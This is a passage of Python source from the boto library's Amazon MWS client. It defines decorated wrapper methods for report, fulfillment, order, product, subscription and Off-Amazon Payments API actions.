"""Returns a count of report requests that have been submitted
to Amazon MWS for processing.
"""
return self._post_request(request, kw, response)
@api_action('Reports', 10, 45)
def cancel_report_requests(self, request, response, **kw):
"""Cancel one or more report requests, returning the count of the
canceled report requests and the report request information.
"""
return self._post_request(request, kw, response)
@boolean_arguments('Acknowledged')
@structured_lists('ReportRequestIdList.Id', 'ReportTypeList.Type')
@api_action('Reports', 10, 60)
def get_report_list(self, request, response, **kw):
"""Returns a list of reports that were created in the previous
90 days that match the query parameters.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Reports', 0, 0)
def get_report_list_by_next_token(self, request, response, **kw):
"""Returns a list of reports using the NextToken, which
was supplied by a previous request to either
GetReportListByNextToken or GetReportList, where the
value of HasNext was true in the previous call.
"""
return self._post_request(request, kw, response)
@boolean_arguments('Acknowledged')
@structured_lists('ReportTypeList.Type')
@api_action('Reports', 10, 45)
def get_report_count(self, request, response, **kw):
"""Returns a count of the reports, created in the previous 90 days,
with a status of _DONE_ and that are available for download.
"""
return self._post_request(request, kw, response)
@requires(['ReportId'])
@api_action('Reports', 15, 60)
def get_report(self, request, response, **kw):
"""Returns the contents of a report.
"""
return self._post_request(request, kw, response)
@requires(['ReportType', 'Schedule'])
@api_action('Reports', 10, 45)
def manage_report_schedule(self, request, response, **kw):
"""Creates, updates, or deletes a report request schedule for
a specified report type.
"""
return self._post_request(request, kw, response)
@structured_lists('ReportTypeList.Type')
@api_action('Reports', 10, 45)
def get_report_schedule_list(self, request, response, **kw):
"""Returns a list of order report requests that are scheduled
to be submitted to Amazon MWS for processing.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Reports', 0, 0)
def get_report_schedule_list_by_next_token(self, request, response, **kw):
"""Returns a list of report requests using the NextToken,
which was supplied by a previous request to either
GetReportScheduleListByNextToken or GetReportScheduleList,
where the value of HasNext was true in that previous request.
"""
return self._post_request(request, kw, response)
@structured_lists('ReportTypeList.Type')
@api_action('Reports', 10, 45)
def get_report_schedule_count(self, request, response, **kw):
"""Returns a count of order report requests that are scheduled
to be submitted to Amazon MWS.
"""
return self._post_request(request, kw, response)
@requires(['ReportIdList'])
@boolean_arguments('Acknowledged')
@structured_lists('ReportIdList.Id')
@api_action('Reports', 10, 45)
def update_report_acknowledgements(self, request, response, **kw):
"""Updates the acknowledged status of one or more reports.
"""
return self._post_request(request, kw, response)
@requires(['ShipFromAddress', 'InboundShipmentPlanRequestItems'])
@structured_objects('ShipFromAddress', 'InboundShipmentPlanRequestItems')
@api_action('Inbound', 30, 0.5)
def create_inbound_shipment_plan(self, request, response, **kw):
"""Returns the information required to create an inbound shipment.
"""
return self._post_request(request, kw, response)
@requires(['ShipmentId', 'InboundShipmentHeader', 'InboundShipmentItems'])
@structured_objects('InboundShipmentHeader', 'InboundShipmentItems')
@api_action('Inbound', 30, 0.5)
def create_inbound_shipment(self, request, response, **kw):
"""Creates an inbound shipment.
"""
return self._post_request(request, kw, response)
@requires(['ShipmentId'])
@structured_objects('InboundShipmentHeader', 'InboundShipmentItems')
@api_action('Inbound', 30, 0.5)
def update_inbound_shipment(self, request, response, **kw):
"""Updates an existing inbound shipment. Amazon documentation
is ambiguous as to whether the InboundShipmentHeader and
InboundShipmentItems arguments are required.
"""
return self._post_request(request, kw, response)
@requires_some_of('ShipmentIdList', 'ShipmentStatusList')
@structured_lists('ShipmentIdList.Id', 'ShipmentStatusList.Status')
@api_action('Inbound', 30, 0.5)
def list_inbound_shipments(self, request, response, **kw):
"""Returns a list of inbound shipments based on criteria that
you specify.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Inbound', 30, 0.5)
def list_inbound_shipments_by_next_token(self, request, response, **kw):
"""Returns the next page of inbound shipments using the NextToken
parameter.
"""
return self._post_request(request, kw, response)
@requires(['ShipmentId'], ['LastUpdatedAfter', 'LastUpdatedBefore'])
@api_action('Inbound', 30, 0.5)
def list_inbound_shipment_items(self, request, response, **kw):
"""Returns a list of items in a specified inbound shipment, or a
list of items that were updated within a specified time frame.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Inbound', 30, 0.5)
def list_inbound_shipment_items_by_next_token(self, request, response, **kw):
"""Returns the next page of inbound shipment items using the
NextToken parameter.
"""
return self._post_request(request, kw, response)
@api_action('Inbound', 2, 300, 'GetServiceStatus')
def get_inbound_service_status(self, request, response, **kw):
"""Returns the operational status of the Fulfillment Inbound
Shipment API section.
"""
return self._post_request(request, kw, response)
@requires(['SellerSkus'], ['QueryStartDateTime'])
@structured_lists('SellerSkus.member')
@api_action('Inventory', 30, 0.5)
def list_inventory_supply(self, request, response, **kw):
"""Returns information about the availability of a seller's
inventory.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Inventory', 30, 0.5)
def list_inventory_supply_by_next_token(self, request, response, **kw):
"""Returns the next page of information about the availability
of a seller's inventory using the NextToken parameter.
"""
return self._post_request(request, kw, response)
@api_action('Inventory', 2, 300, 'GetServiceStatus')
def get_inventory_service_status(self, request, response, **kw):
"""Returns the operational status of the Fulfillment Inventory
API section.
"""
return self._post_request(request, kw, response)
@requires(['PackageNumber'])
@api_action('Outbound', 30, 0.5)
def get_package_tracking_details(self, request, response, **kw):
"""Returns delivery tracking information for a package in
an outbound shipment for a Multi-Channel Fulfillment order.
"""
return self._post_request(request, kw, response)
@requires(['Address', 'Items'])
@structured_objects('Address', 'Items')
@api_action('Outbound', 30, 0.5)
def get_fulfillment_preview(self, request, response, **kw):
"""Returns a list of fulfillment order previews based on items
and shipping speed categories that you specify.
"""
return self._post_request(request, kw, response)
@requires(['SellerFulfillmentOrderId', 'DisplayableOrderId',
'ShippingSpeedCategory', 'DisplayableOrderDateTime',
'DestinationAddress', 'DisplayableOrderComment',
'Items'])
@structured_objects('DestinationAddress', 'Items')
@api_action('Outbound', 30, 0.5)
def create_fulfillment_order(self, request, response, **kw):
"""Requests that Amazon ship items from the seller's inventory
to a destination address.
"""
return self._post_request(request, kw, response)
@requires(['SellerFulfillmentOrderId'])
@api_action('Outbound', 30, 0.5)
def get_fulfillment_order(self, request, response, **kw):
"""Returns a fulfillment order based on a specified
SellerFulfillmentOrderId.
"""
return self._post_request(request, kw, response)
@api_action('Outbound', 30, 0.5)
def list_all_fulfillment_orders(self, request, response, **kw):
"""Returns a list of fulfillment orders fulfilled after (or
at) a specified date or by fulfillment method.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Outbound', 30, 0.5)
def list_all_fulfillment_orders_by_next_token(self, request, response, **kw):
"""Returns the next page of inbound shipment items using the
NextToken parameter.
"""
return self._post_request(request, kw, response)
@requires(['SellerFulfillmentOrderId'])
@api_action('Outbound', 30, 0.5)
def cancel_fulfillment_order(self, request, response, **kw):
"""Requests that Amazon stop attempting to fulfill an existing
fulfillment order.
"""
return self._post_request(request, kw, response)
@api_action('Outbound', 2, 300, 'GetServiceStatus')
def get_outbound_service_status(self, request, response, **kw):
"""Returns the operational status of the Fulfillment Outbound
API section.
"""
return self._post_request(request, kw, response)
@requires(['CreatedAfter'], ['LastUpdatedAfter'])
@requires(['MarketplaceId'])
@exclusive(['CreatedAfter'], ['LastUpdatedAfter'])
@dependent('CreatedBefore', ['CreatedAfter'])
@exclusive(['LastUpdatedAfter'], ['BuyerEmail'], ['SellerOrderId'])
@dependent('LastUpdatedBefore', ['LastUpdatedAfter'])
@exclusive(['CreatedAfter'], ['LastUpdatedBefore'])
@structured_objects('OrderTotal', 'ShippingAddress',
'PaymentExecutionDetail')
@structured_lists('MarketplaceId.Id', 'OrderStatus.Status',
'FulfillmentChannel.Channel', 'PaymentMethod.')
@api_action('Orders', 6, 60)
def list_orders(self, request, response, **kw):
"""Returns a list of orders created or updated during a time
frame that you specify.
"""
toggle = set(('FulfillmentChannel.Channel.1',
'OrderStatus.Status.1', 'PaymentMethod.1',
'LastUpdatedAfter', 'LastUpdatedBefore'))
for do, dont in {
'BuyerEmail': toggle.union(['SellerOrderId']),
'SellerOrderId': toggle.union(['BuyerEmail']),
}.items():
if do in kw and any(i in dont for i in kw):
message = "Don't include {0} when specifying " \
"{1}".format(' or '.join(dont), do)
raise AssertionError(message)
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Orders', 6, 60)
def list_orders_by_next_token(self, request, response, **kw):
"""Returns the next page of orders using the NextToken value
that was returned by your previous request to either
ListOrders or ListOrdersByNextToken.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderId'])
@structured_lists('AmazonOrderId.Id')
@api_action('Orders', 6, 60)
def get_order(self, request, response, **kw):
"""Returns an order for each AmazonOrderId that you specify.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderId'])
@api_action('Orders', 30, 2)
def list_order_items(self, request, response, **kw):
"""Returns order item information for an AmazonOrderId that
you specify.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Orders', 30, 2)
def list_order_items_by_next_token(self, request, response, **kw):
"""Returns the next page of order items using the NextToken
value that was returned by your previous request to either
ListOrderItems or ListOrderItemsByNextToken.
"""
return self._post_request(request, kw, response)
@api_action('Orders', 2, 300, 'GetServiceStatus')
def get_orders_service_status(self, request, response, **kw):
"""Returns the operational status of the Orders API section.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Query'])
@api_action('Products', 20, 20)
def list_matching_products(self, request, response, **kw):
"""Returns a list of products and their attributes, ordered
by relevancy, based on a search query that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASINList'])
@structured_lists('ASINList.ASIN')
@api_action('Products', 20, 20)
def get_matching_product(self, request, response, **kw):
"""Returns a list of products and their attributes, based on
a list of ASIN values that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'IdType', 'IdList'])
@structured_lists('IdList.Id')
@api_action('Products', 20, 20)
def get_matching_product_for_id(self, request, response, **kw):
"""Returns a list of products and their attributes, based on
a list of Product IDs that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'SellerSKUList'])
@structured_lists('SellerSKUList.SellerSKU')
@api_action('Products', 20, 10, 'GetCompetitivePricingForSKU')
def get_competitive_pricing_for_sku(self, request, response, **kw):
"""Returns the current competitive pricing of a product,
based on the SellerSKUs and MarketplaceId that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASINList'])
@structured_lists('ASINList.ASIN')
@api_action('Products', 20, 10, 'GetCompetitivePricingForASIN')
def get_competitive_pricing_for_asin(self, request, response, **kw):
"""Returns the current competitive pricing of a product,
based on the ASINs and MarketplaceId that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'SellerSKUList'])
@structured_lists('SellerSKUList.SellerSKU')
@api_action('Products', 20, 5, 'GetLowestOfferListingsForSKU')
def get_lowest_offer_listings_for_sku(self, request, response, **kw):
"""Returns the lowest price offer listings for a specific
product by item condition and SellerSKUs.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASINList'])
@structured_lists('ASINList.ASIN')
@api_action('Products', 20, 5, 'GetLowestOfferListingsForASIN')
def get_lowest_offer_listings_for_asin(self, request, response, **kw):
"""Returns the lowest price offer listings for a specific
product by item condition and ASINs.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'SellerSKU'])
@api_action('Products', 20, 20, 'GetProductCategoriesForSKU')
def get_product_categories_for_sku(self, request, response, **kw):
"""Returns the product categories that a SellerSKU belongs to.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASIN'])
@api_action('Products', 20, 20, 'GetProductCategoriesForASIN')
def get_product_categories_for_asin(self, request, response, **kw):
"""Returns the product categories that an ASIN belongs to.
"""
return self._post_request(request, kw, response)
@api_action('Products', 2, 300, 'GetServiceStatus')
def get_products_service_status(self, request, response, **kw):
"""Returns the operational status of the Products API section.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'SellerSKUList'])
@structured_lists('SellerSKUList.SellerSKU')
@api_action('Products', 20, 10, 'GetMyPriceForSKU')
def get_my_price_for_sku(self, request, response, **kw):
"""Returns pricing information for your own offer listings, based on SellerSKU.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASINList'])
@structured_lists('ASINList.ASIN')
@api_action('Products', 20, 10, 'GetMyPriceForASIN')
def get_my_price_for_asin(self, request, response, **kw):
"""Returns pricing information for your own offer listings, based on ASIN.
"""
return self._post_request(request, kw, response)
@api_action('Sellers', 15, 60)
def list_marketplace_participations(self, request, response, **kw):
"""Returns a list of marketplaces that the seller submitting
the request can sell in, and a list of participations that
include seller-specific information in that marketplace.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Sellers', 15, 60)
def list_marketplace_participations_by_next_token(self, request, response,
**kw):
"""Returns the next page of marketplaces and participations
using the NextToken value that was returned by your
previous request to either ListMarketplaceParticipations
or ListMarketplaceParticipationsByNextToken.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId'])
@api_action('Recommendations', 5, 2)
def get_last_updated_time_for_recommendations(self, request, response,
**kw):
"""Checks whether there are active recommendations for each category
for the given marketplace, and if there are, returns the time when
recommendations were last updated for each category.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId'])
@structured_lists('CategoryQueryList.CategoryQuery')
@api_action('Recommendations', 5, 2)
def list_recommendations(self, request, response, **kw):
"""Returns your active recommendations for a specific category or for
all categories for a specific marketplace.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Recommendations', 5, 2)
def list_recommendations_by_next_token(self, request, response, **kw):
"""Returns the next page of recommendations using the NextToken
parameter.
"""
return self._post_request(request, kw, response)
@api_action('Recommendations', 2, 300, 'GetServiceStatus')
def get_recommendations_service_status(self, request, response, **kw):
"""Returns the operational status of the Recommendations API section.
"""
return self._post_request(request, kw, response)
@api_action('CustomerInfo', 15, 12)
def list_customers(self, request, response, **kw):
"""Returns a list of customer accounts based on search criteria that
you specify.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('CustomerInfo', 50, 3)
def list_customers_by_next_token(self, request, response, **kw):
"""Returns the next page of customers using the NextToken parameter.
"""
return self._post_request(request, kw, response)
@requires(['CustomerIdList'])
@structured_lists('CustomerIdList.CustomerId')
@api_action('CustomerInfo', 15, 12)
def get_customers_for_customer_id(self, request, response, **kw):
"""Returns a list of customer accounts based on search criteria that
you specify.
"""
return self._post_request(request, kw, response)
@api_action('CustomerInfo', 2, 300, 'GetServiceStatus')
def get_customerinfo_service_status(self, request, response, **kw):
"""Returns the operational status of the Customer Information API
section.
"""
return self._post_request(request, kw, response)
@requires(['DateRangeStart'])
@api_action('CartInfo', 15, 12)
def list_carts(self, request, response, **kw):
"""Returns a list of shopping carts in your Webstore that were last
updated during the time range that you specify.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('CartInfo', 50, 3)
def list_carts_by_next_token(self, request, response, **kw):
"""Returns the next page of shopping carts using the NextToken
parameter.
"""
return self._post_request(request, kw, response)
@requires(['CartIdList'])
@structured_lists('CartIdList.CartId')
@api_action('CartInfo', 15, 12)
def get_carts(self, request, response, **kw):
"""Returns shopping carts based on the CartId values that you specify.
"""
return self._post_request(request, kw, response)
@api_action('CartInfo', 2, 300, 'GetServiceStatus')
def get_cartinfo_service_status(self, request, response, **kw):
"""Returns the operational status of the Cart Information API section.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def register_destination(self, request, response, **kw):
"""Specifies a new destination where you want to receive notifications.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def deregister_destination(self, request, response, **kw):
"""Removes an existing destination from the list of registered
destinations.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId'])
@api_action('Subscriptions', 25, 0.5)
def list_registered_destinations(self, request, response, **kw):
"""Lists all current destinations that you have registered.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def send_test_notification_to_destination(self, request, response, **kw):
"""Sends a test notification to an existing destination.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Subscription'])
@structured_objects('Subscription', members=True)
@api_action('Subscriptions', 25, 0.5)
def create_subscription(self, request, response, **kw):
"""Creates a new subscription for the specified notification type
and destination.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'NotificationType', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def get_subscription(self, request, response, **kw):
"""Gets the subscription for the specified notification type and
destination.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'NotificationType', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def delete_subscription(self, request, response, **kw):
"""Deletes the subscription for the specified notification type and
destination.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId'])
@api_action('Subscriptions', 25, 0.5)
def list_subscriptions(self, request, response, **kw):
"""Returns a list of all your current subscriptions.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Subscription'])
@structured_objects('Subscription', members=True)
@api_action('Subscriptions', 25, 0.5)
def update_subscription(self, request, response, **kw):
"""Updates the subscription for the specified notification type and
destination.
"""
return self._post_request(request, kw, response)
@api_action('Subscriptions', 2, 300, 'GetServiceStatus')
def get_subscriptions_service_status(self, request, response, **kw):
"""Returns the operational status of the Subscriptions API section.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId', 'OrderReferenceAttributes'])
@structured_objects('OrderReferenceAttributes')
@api_action('OffAmazonPayments', 10, 1)
def set_order_reference_details(self, request, response, **kw):
"""Sets order reference details such as the order total and a
description for the order.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId'])
@api_action('OffAmazonPayments', 20, 2)
def get_order_reference_details(self, request, response, **kw):
"""Returns details about the Order Reference object and its current
state.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId'])
@api_action('OffAmazonPayments', 10, 1)
def confirm_order_reference(self, request, response, **kw):
"""Confirms that the order reference is free of constraints and all
required information has been set on the order reference.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId'])
@api_action('OffAmazonPayments', 10, 1)
def cancel_order_reference(self, request, response, **kw):
"""Cancel an order reference; all authorizations associated with
this order reference are also closed.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId'])
@api_action('OffAmazonPayments', 10, 1)
def close_order_reference(self, request, response, **kw):
"""Confirms that an order reference has been fulfilled (fully
or partially) and that you do not expect to create any new
authorizations on this order reference.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId', 'AuthorizationReferenceId',
'AuthorizationAmount'])
@structured_objects('AuthorizationAmount')
@api_action('OffAmazonPayments', 10, 1)
def authorize(self, request, response, **kw):
"""Reserves a specified amount against the payment method(s) stored in
the order reference.
"""
return self._post_request(request, kw, response)
@requires(['AmazonAuthorizationId'])
@api_action('OffAmazonPayments', 20, 2)
def get_authorization_details(self, request, response, **kw):
"""Returns the status of a particular authorization and the total
amount captured on the authorization.
"""
return self._post_request(request, kw, response)
@requires(['AmazonAuthorizationId', 'CaptureReferenceId', 'CaptureAmount'])
@structured_objects('CaptureAmount')
@api_action('OffAmazonPayments', 10, 1)
def capture(self, request, response, **kw):
"""Captures funds from an authorized payment instrument.
"""
return self._post_request(request, kw, response)
@requires(['AmazonCaptureId'])
@api_action('OffAmazonPayments', 20, 2)
def get_capture_details(self, request, response, **kw):
"""Returns the status of a particular capture and the total amount
refunded on the capture.
"""
return self._post_request(request, kw, response)
@requires(['AmazonAuthorizationId'])
@api_action('OffAmazonPayments', 10, 1)
def close_authorization(self, request, response, **kw):
"""Closes an authorization.
"""
return self._post_request(request, kw, response)
@requires(['AmazonCaptureId', 'RefundReferenceId', 'RefundAmount'])
@structured_objects('RefundAmount')
@api_action('OffAmazonPayments', 10, 1)
def refund(self, request, response, **kw):
"""Refunds a previously captured amount.
"""
return self._post_request(request, kw, response)
@requires(['AmazonRefundId'])
@api_action('OffAmazonPayments', 20, 2)
def get_refund_details(self, request, response, **kw):
"""Returns the status of a particular refund.
"""
return self._post_request(request, kw, response)
@api_action('OffAmazonPayments', 2, 300, 'GetServiceStatus')
def get_offamazonpayments_service_status(self, request, response, **kw):
"""Returns the operational status of the Off-Amazon Payments API
section.
"""
return self._post_request(request, kw, response)
| GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/boto/mws/connection.py | Python | agpl-3.0 | 49,807 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.